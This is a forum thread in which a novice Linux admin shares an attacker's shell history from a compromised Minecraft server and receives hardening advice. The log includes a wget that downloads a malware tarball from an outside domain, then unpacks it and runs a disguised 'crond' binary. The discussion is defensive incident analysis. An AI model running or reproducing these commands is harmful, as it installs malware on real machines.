Thread: Attempting to learn about this intrusion

Beans

Post Attempting to learn about this intrusion

Hello there, I am a rather n00bish linux administrator attempting to provide a service to my friends; a Minecraft server.

I noticed a few months ago while popping in over VNC to check on it that someone had run some commands on my box. I wanted to see where I could go to learn more about them, what happened, how they gained entry and what they planned to do.

Code:
    history
    wget www.deathface.comlu.com/emek/mechlinux.tgz
    tar zxfv mechlinus.tgz
    cd ...
    nano mech.set
    nano emech.users
    nano emech.users1
    nano emech.users2
    ./crond
    All of my Google research has pulled up that this mechlinux is indeed associated with malware. I've given up on actually planning on salvaging the system; I plan a full on nuke of it to start again fresh. Some of my foolish mistakes were that I did not use SSL to administer the network, didn't set up a firewall, and used unsecure passwords. I will not make that mistake again, but if anyone else could help me to see exactly what happened with my system, I would be quite grateful.

Beans
    Hidden!
    Distro
    Kubuntu Development Release

Re: Attempting to learn about this intrusion

You used weak passwords, and an intruder guessed the password.

You can look at the files in the tar ball and the files to see what they do. You could pastebin the contents of the files somewhere if you wish.

You are almost certainly best off performing a fresh install and using strong passwords. ssl + firewall will help. You can configure the firewall to block repeat login attempts or use a service such as fail2ban.

See:

http://bodhizazen.net/Tutorials/iptables/

The additional tips section has advice for configuration under "Use iptables to block failed connections"
    There are two mistakes one can make along the road to truth...not going all the way, and not starting.
    --Prince Gautama Siddharta

#ubuntuforums web interface

Beans
    Distro
    Ubuntu Development Release

Re: Attempting to learn about this intrusion

Quote Originally Posted by bodhi.zazen View Post
    You used weak passwords, and an intruder guessed the password.

You can look at the files in the tar ball and the files to see what they do. You could pastebin the contents of the files somewhere if you wish.

You are almost certainly best off performing a fresh install and using strong passwords. ssl + firewall will help. You can configure the firewall to block repeat login attempts or use a service such as fail2ban.

See:

http://bodhizazen.net/Tutorials/iptables/

The additional tips section has advice for configuration under "Use iptables to block failed connections"
    I bet what you offer him are just the fundamental but there are more things to do beside that. Setting a server is a open gate to any form of attacks such as using program exploits, DDOS, brute force dictionary attack, SQL, etc. There are no 100% bulletproof server but what you can do are to isolate the attacks and minimum the damage such as reformat,etc. A backup will always come handy.